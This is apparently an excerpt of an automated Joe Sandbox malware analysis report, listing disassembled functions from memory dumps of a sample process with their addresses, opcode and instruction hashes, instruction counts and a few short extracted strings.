                                        • Opcode Fuzzy Hash: d059e02feffc439781a05bcc582ffac2fb2b9937f66db8b10e6347e2c67e41d8
                                        • Instruction Fuzzy Hash: 87E0863170051457D6185BAB9844A6BBBDFEFC9B20714C06DE51D93344CE60AC0186D5
                                        Function 0748BE28 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfecf93fd7e2b5fe3f97ded65f501b42f37c64dbe406178c26735ddc7691c1b6
                                        • Instruction ID: 64f2cbf41dabc9d3a877f1a7c42baeef2aa5965d02b18ec5dc7e3d54faec313b
                                        • Opcode Fuzzy Hash: cfecf93fd7e2b5fe3f97ded65f501b42f37c64dbe406178c26735ddc7691c1b6
                                        • Instruction Fuzzy Hash: 89F0A5B4D1520CEFCB44EFA8D4459AEBBB5FB49301F1081AAE80493310D7359A54DF80
                                        Function 0748F9B0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92e193313b12ee1ddeb9a9e9d6c1877cd66582d7bab37055cf8b27846665782d
                                        • Instruction ID: ec827ec4c9613d3a567103bb408ce41f162ba12a70b314b27ae8b649e63a155e
                                        • Opcode Fuzzy Hash: 92e193313b12ee1ddeb9a9e9d6c1877cd66582d7bab37055cf8b27846665782d
                                        • Instruction Fuzzy Hash: 08F0A574E0420CBFCB45EFA8D44469DBBB6EB49311F10C1AAE814A3350E6359A55DF91
                                        Function 07484190 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9125448af389bca9add5491cad7cfe50884d2c9a47c003a2fc35d23596df455
                                        • Instruction ID: 76a3ee8898bff41fa322e518b0d7eb5aa362db63396424a81c1211fc332d0045
                                        • Opcode Fuzzy Hash: f9125448af389bca9add5491cad7cfe50884d2c9a47c003a2fc35d23596df455
                                        • Instruction Fuzzy Hash: FBE08C313505148F8344FFA8E5659567BEAAF8CA203208069F90ACB328EE30DC068B91
                                        Function 074850CE Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8349817a3752e2df2e493448df5ea3d0ffcf9d56aca37d7a9b19ebf8ae6c9bfc
                                        • Instruction ID: bf836c762d2aed0807cd92713fc4633c9dafc5e2380c8165b3b5b1653ec467df
                                        • Opcode Fuzzy Hash: 8349817a3752e2df2e493448df5ea3d0ffcf9d56aca37d7a9b19ebf8ae6c9bfc
                                        • Instruction Fuzzy Hash: 7AD05EB1E1800CDFC740AAA4E8444EDFB70E78B251F004823D122E3210E7301425CA98
                                        Function 0748B2E8 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c2c0e89953f8526ba42e7503931f3078fc1802432de84d68c21d6f2c15bf13b
                                        • Instruction ID: 3cd85d7474f4d360b61e948f0a52208a322e7c8b6581b536a7441022331b8cdb
                                        • Opcode Fuzzy Hash: 0c2c0e89953f8526ba42e7503931f3078fc1802432de84d68c21d6f2c15bf13b
                                        • Instruction Fuzzy Hash: 31E0E2B092520CEFCB80EFA8D44A69DBFF4AB04211F1041A9E808E3350EB315A94CB81
                                        Function 0748A968 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 687e1b4547c1523a97ad1392ed0507413e86ff091f0993f117e5f62476d4716c
                                        • Instruction ID: 58e1568adf4c8c57f620e1cbaed23c4f9f8f957bf2efdd8fb619f0f1f8253923
                                        • Opcode Fuzzy Hash: 687e1b4547c1523a97ad1392ed0507413e86ff091f0993f117e5f62476d4716c
                                        • Instruction Fuzzy Hash: 46D097638883C84FC71282A83EFA00D3BF10992010F280E97CC28CF1E3F04CC44A02C2
                                        Function 0748BB00 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30b7904fb8db648409a99b258add727c7b7b59fe3560f195e0d4b10439461e0a
                                        • Instruction ID: ff3fd2bf0d835ff73481ee0a60b618dc9d4f231cdc2832d6a122a65aa331ac31
                                        • Opcode Fuzzy Hash: 30b7904fb8db648409a99b258add727c7b7b59fe3560f195e0d4b10439461e0a
                                        • Instruction Fuzzy Hash: 3DD017B091520CDFCB04EFA8E4055AEBFB5EB41302F5041ADE80463354DB315A94DB85
                                        Function 07480B8A Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e000ab2d7cb8720d63601975e45de93e08377f3df9f18ea6004bf77be681ad6
                                        • Instruction ID: 75eb6318304a7f931217a7d2cc455fb7848192dc7ce44fb9c80d05f400b35eb8
                                        • Opcode Fuzzy Hash: 7e000ab2d7cb8720d63601975e45de93e08377f3df9f18ea6004bf77be681ad6
                                        • Instruction Fuzzy Hash: 48D0177286021D8FCF46DBA8CA824AEBB36BF85204B558906A00177614CA75EA159F45
                                        Function 07488169 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d2a604cee64201c31724e8a0ffbd87a01ed54b7c9750c4815a0a591f1762e02
                                        • Instruction ID: a7f247ffbff922acdf93f6c30aab22884ca91dd9e6b2b2c366bb8395d3f6fbfd
                                        • Opcode Fuzzy Hash: 5d2a604cee64201c31724e8a0ffbd87a01ed54b7c9750c4815a0a591f1762e02
                                        • Instruction Fuzzy Hash: 68C08CE12E426E8AE28236604C2058C2920CAA1B01354808785448B2C3EF20801A82A6
                                        Function 07484AD1 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 441d19c370d25d0f9b544623faf1c7a3a216a07ac6593fbf56243c52f133174b
                                        • Instruction ID: ed8856f60097fc92a8d4af0374e0ed28d1058b560b8b022f991d07b568bbc043
                                        • Opcode Fuzzy Hash: 441d19c370d25d0f9b544623faf1c7a3a216a07ac6593fbf56243c52f133174b
                                        • Instruction Fuzzy Hash: 8EB0121909D3F15FC60313B82AB00C12F7419071117C716C3E1E4CF173C108065843B3
                                        Function 0748A978 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51d4f1f8e600eba1eb39033bacf8c228ba9086d3cfb680ed4fb403e0cfc6f39c
                                        • Instruction ID: 623366fd47bd7105a22e32d1783a70c2c9aebe5c91e2ff65815dc030ffccdf82
                                        • Opcode Fuzzy Hash: 51d4f1f8e600eba1eb39033bacf8c228ba9086d3cfb680ed4fb403e0cfc6f39c
                                        • Instruction Fuzzy Hash: B2C08CB00586088BC2103798F90D3697BA86701302F404415F00881560EFA48428CE22
                                        Function 07485470 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5069e5afb53391b856d74d2081c932c208a9efc22e2d905f76152608b077fd51
                                        • Instruction ID: 8f21c6bd9e95f5eb6304dc2cec747d7fbddf76c17d3d347cc11c3fc17f2b4dfd
                                        • Opcode Fuzzy Hash: 5069e5afb53391b856d74d2081c932c208a9efc22e2d905f76152608b077fd51
                                        • Instruction Fuzzy Hash: 1ED0EAB4D18209CFCB40DF94D5556EDBBB5AB5A302F21851AE41AA2244CB74AE578F40
                                        Function 07483AE4 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21a65867b1128ec9d0844585187f131f0bbb0ceea2b0929b70f959de9611d887
                                        • Instruction ID: 4da430b224503fc334bd04382a452d727ce6f6ae7e5b2a11f5f2bc1e25d4ad93
                                        • Opcode Fuzzy Hash: 21a65867b1128ec9d0844585187f131f0bbb0ceea2b0929b70f959de9611d887
                                        • Instruction Fuzzy Hash: FCC04C75455108DA8685BB548A84C9DBAA5FF95700F859C56A14485031C621C42DA716
                                        Function 0748728C Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f203dfa418780dbd4763dd0b9a6ef5c955d0ba7b944d5dc171043d3ba89792a5
                                        • Instruction ID: 36ed31e04df39c642e32dd1901c4144a8a7df720c5564d62c65665ea49d450f2
                                        • Opcode Fuzzy Hash: f203dfa418780dbd4763dd0b9a6ef5c955d0ba7b944d5dc171043d3ba89792a5
                                        • Instruction Fuzzy Hash: 32B092A51A4208A1808632A949D09AEA854EBA2700B908C1A77054009489308429961B
                                        Function 07480DA9 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ab6794b7b0dcb7fe0fbd2841dba8b4b1fc4ab4d3cc788dfe80c6f94b77a2f12
                                        • Instruction ID: cd39fcbcb2362c7396b8269eea5f4c190dc6e1e5dbb5fa44e0e512cbb92aad88
                                        • Opcode Fuzzy Hash: 4ab6794b7b0dcb7fe0fbd2841dba8b4b1fc4ab4d3cc788dfe80c6f94b77a2f12
                                        • Instruction Fuzzy Hash: 9FC08C70220204CFCB01CB90C1484AE7BB3FF0820A7200419E40212220C731EC02CF00
                                        Function 07482C34 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ed8423d82838ed07b02694c0b0a839b81f5804a383e209ca176e6cd47f1aecf
                                        • Instruction ID: 983a0da91408e53bf3ac400db5d29c9389f26caffb975e75fad7365862908727
                                        • Opcode Fuzzy Hash: 6ed8423d82838ed07b02694c0b0a839b81f5804a383e209ca176e6cd47f1aecf
                                        • Instruction Fuzzy Hash: 66C09B30D2112C89C348FB74FA94D5D7795FE417007004D394005561B6CB586D0DD945
                                        Function 074868DA Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b22b9046fb5d03cd83c7da9f416d324d2a422d0dfc80b9994d1a5296f9cde5b
                                        • Instruction ID: 2abd51a2d57aff57b644759f31a8b7c3891b7b4b67aed078f58c9d777f663445
                                        • Opcode Fuzzy Hash: 4b22b9046fb5d03cd83c7da9f416d324d2a422d0dfc80b9994d1a5296f9cde5b
                                        • Instruction Fuzzy Hash: 30C09B750455409ED7416BB19405849FF71FF56B047454499D58515031EA625429D711

                                        Executed Functions

                                        Function 011BC980 Relevance: 3.5, Strings: 1, Instructions: 2255COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,btq
                                        • API String ID: 0-3970051468
                                        • Opcode ID: 1cd2b4f3d6b4108f9a09a7399d834abc79c22f3f37acfd286ad627ff36195701
                                        • Instruction ID: b15ce6b248172a70d6a3163657c8867ff2b1154b860ab9b92b6d6dd209ef749b
                                        • Opcode Fuzzy Hash: 1cd2b4f3d6b4108f9a09a7399d834abc79c22f3f37acfd286ad627ff36195701
                                        • Instruction Fuzzy Hash: 80332C31D1061A8EDB15EF68C8906DDF7B1FF99300F15C69AD449AB221EB70AAC5CF81
                                        Function 011B9638 Relevance: 2.8, Instructions: 2814COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 360e52a8ea68bf8f6f9a36dbd3b1ffaec17aba9af8d99d5155409e704f5c3bdc
                                        • Instruction ID: 160c5b13911ab6f6ad6da7c4dcdac663c65749b79bab793f424d4c5f84a3e601
                                        • Opcode Fuzzy Hash: 360e52a8ea68bf8f6f9a36dbd3b1ffaec17aba9af8d99d5155409e704f5c3bdc
                                        • Instruction Fuzzy Hash: 9353F531D10B1A8ACB55EF68C8906E9F7B1FF99300F11C79AE45877121EB70AAD5CB81
                                        Function 011B4AA8 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 023b667a7ee08cc517afefcbb81f7555bfed58fee2fef8520f949472f2f40bc4
                                        • Instruction ID: 590a8d8bcd8787ad223a72c261fa94a4c39390331f64776803421de0dc415a76
                                        • Opcode Fuzzy Hash: 023b667a7ee08cc517afefcbb81f7555bfed58fee2fef8520f949472f2f40bc4
                                        • Instruction Fuzzy Hash: FCB14A70E002098FDF18CFA9C9D17EDBBF2AF88714F14C529D81AA7695EB749845CB81
                                        Function 011B3E90 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9496b962a40ae1c1e0fb29f00c21f0243414ffcf1f9b6b07519427e3f95e85e0
                                        • Instruction ID: 5e40aa2c512eefcf58c46ce881a4b1bf323abe9216e8c6fdcf652aef88fc64d5
                                        • Opcode Fuzzy Hash: 9496b962a40ae1c1e0fb29f00c21f0243414ffcf1f9b6b07519427e3f95e85e0
                                        • Instruction Fuzzy Hash: 2A915B70E00209DFDF18CFA9C9917EEBBF2BF88714F148529E415A7694EB349845CB92
                                        Function 011BEEC5 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: d9fb13b8f0c1ad430291953a6fd90bc2daab6ce09b9d815abf37247ed093dd56
                                        • Instruction ID: d5716e9f89c0d2db3450da5025f086ad9c087eaa87ef6fd0c4d9203b247f2e92
                                        • Opcode Fuzzy Hash: d9fb13b8f0c1ad430291953a6fd90bc2daab6ce09b9d815abf37247ed093dd56
                                        • Instruction Fuzzy Hash: ED51AE34B002158FDB1A9B78D9946EE7BE2AF89214F108828E446DB395DF74DC42CB91
                                        Function 011B71E8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: def2c6b1b61bf147146075a26fadf9c4f18cad79724232346a7753c58c69f4e8
                                        • Instruction ID: 5616131765e510dd0bceab7a8b8585c867363d6c32505a5abd3105fa187b9503
                                        • Opcode Fuzzy Hash: def2c6b1b61bf147146075a26fadf9c4f18cad79724232346a7753c58c69f4e8
                                        • Instruction Fuzzy Hash: E8314130E102099FDB19CFA8C4857EEB7B2EF85304F208569F806EB3D1DB7599428B51
                                        Function 011B71F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: 51035f3047c9414d5bb604267bf3d18b3ff5d9789ef072d8e00a0350f019b895
                                        • Instruction ID: e1aa92b5f10fd15617fba5b231f54580dfebc21ee0a62787ef13025013baac84
                                        • Opcode Fuzzy Hash: 51035f3047c9414d5bb604267bf3d18b3ff5d9789ef072d8e00a0350f019b895
                                        • Instruction Fuzzy Hash: B8315C31E102099BDB19CFA8D4847EEB7B2EF85304F208565F906EB2D0DB74A9418B91
                                        Function 011B6BA9 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: 8544f52b94b80ca471aba313e36eb98e218f37811cb4e684e78683854e269ecf
                                        • Instruction ID: e01e44dc13f4b9163dacda118a3df792a65635f0a300ae982a1e89e93fe1567c
                                        • Opcode Fuzzy Hash: 8544f52b94b80ca471aba313e36eb98e218f37811cb4e684e78683854e269ecf
                                        • Instruction Fuzzy Hash: CF010031B041019FC32AAF79842839EBBB2EF85744F0088AED01ACB382DB349845C782
                                        Function 011B8E5C Relevance: .4, Instructions: 375COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b2471adcc41591625327af33dca24cf361c25dd41a50bfd225db11ffb2c37c1
                                        • Instruction ID: 4a4ef744f8f763df37aab2a64f50ed0042874533088bfef501baf58f73b836e7
                                        • Opcode Fuzzy Hash: 8b2471adcc41591625327af33dca24cf361c25dd41a50bfd225db11ffb2c37c1
                                        • Instruction Fuzzy Hash: 61D1BF74B002098FDB19DFA8D5C4AADBBB6EF88314F148469E906DB395DB35DC42CB81
                                        Function 011B91D8 Relevance: .4, Instructions: 360COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9fc41e7020ce1ff1d0cab3010a7d8fc2661614c4c1c58563ec2122e8160cfad
                                        • Instruction ID: 6005f2307d7593e5c15277d0ea9b1fbe69e5a8542027adf47e927666c6a762ec
                                        • Opcode Fuzzy Hash: e9fc41e7020ce1ff1d0cab3010a7d8fc2661614c4c1c58563ec2122e8160cfad
                                        • Instruction Fuzzy Hash: 8ED1A1B0B002098FDB18DFA9D98479EBBB1FF88314F10856AE609DB395D774D846CB91
                                        Function 011B7780 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3332ad9d6302c6de965033d12d2743b7d7241a46a20200c210cd6e36b56b417d
                                        • Instruction ID: 8a7863e0abd56aac677242ef35efd15d2052e91e06078cd11fe684a5e7bb83ee
                                        • Opcode Fuzzy Hash: 3332ad9d6302c6de965033d12d2743b7d7241a46a20200c210cd6e36b56b417d
                                        • Instruction Fuzzy Hash: 9BB18F30B001059FDB2EAB2CEA8467936A6EFC5358B504D39E106CB795CF79DD86DB80
                                        Function 011B4A9C Relevance: .3, Instructions: 262COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 101d3fcf16108538afa6798ac7834aa414b72f1fe4198fe37d7a4054153c89bc
                                        • Instruction ID: 6fb516200ae2e5a97af14727b32627e30f9dbadac37dc8198c10ecfc73302786
                                        • Opcode Fuzzy Hash: 101d3fcf16108538afa6798ac7834aa414b72f1fe4198fe37d7a4054153c89bc
                                        • Instruction Fuzzy Hash: DEB16B70E002098FDF18CFA8C9D17EDBBF1AF89714F14C529D81AA7655EB749885CB81
                                        Function 011B3E84 Relevance: .2, Instructions: 235COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9d74a99d7395fa325bf8dcffc35efd4f5cd28ac3c01b8d919dee3a2658ded8a
                                        • Instruction ID: bb14828afb522e052556abac611038c3d2dacdea6368b057d366f3ca94bb57ec
                                        • Opcode Fuzzy Hash: a9d74a99d7395fa325bf8dcffc35efd4f5cd28ac3c01b8d919dee3a2658ded8a
                                        • Instruction Fuzzy Hash: D1916B70E00209DFDF18CFA9C9857EEBBF2BF88714F148129E415A7654EB349885CB92
                                        Function 011B4814 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da768c9c1a12d5ead029aff64ab65247e072a2b0f665f19a1d2e4ec04902eb3a
                                        • Instruction ID: fa18ac435932ee8672c16ab503f82fc39a403ffc8a4e77a172fe1583a30e9562
                                        • Opcode Fuzzy Hash: da768c9c1a12d5ead029aff64ab65247e072a2b0f665f19a1d2e4ec04902eb3a
                                        • Instruction Fuzzy Hash: 00717AB0E00249CFDF18CFA9C9817DEBBF2AF88714F14C129E41AA7655EB749841CB95
                                        Function 011B4820 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28acc0484296e8689272b57477b9c03ea4e4cf72a644d5d11f288601631f5d57
                                        • Instruction ID: 227d283bdb7692e534a8dd21ceb29a88a30400d944f10ff240b6e204205dc399
                                        • Opcode Fuzzy Hash: 28acc0484296e8689272b57477b9c03ea4e4cf72a644d5d11f288601631f5d57
                                        • Instruction Fuzzy Hash: F3716BB0E00249CFDF18CFA9C9807DEBBF2AF88714F14C129E416A7655EB749842CB95
                                        Function 011B4F9A Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
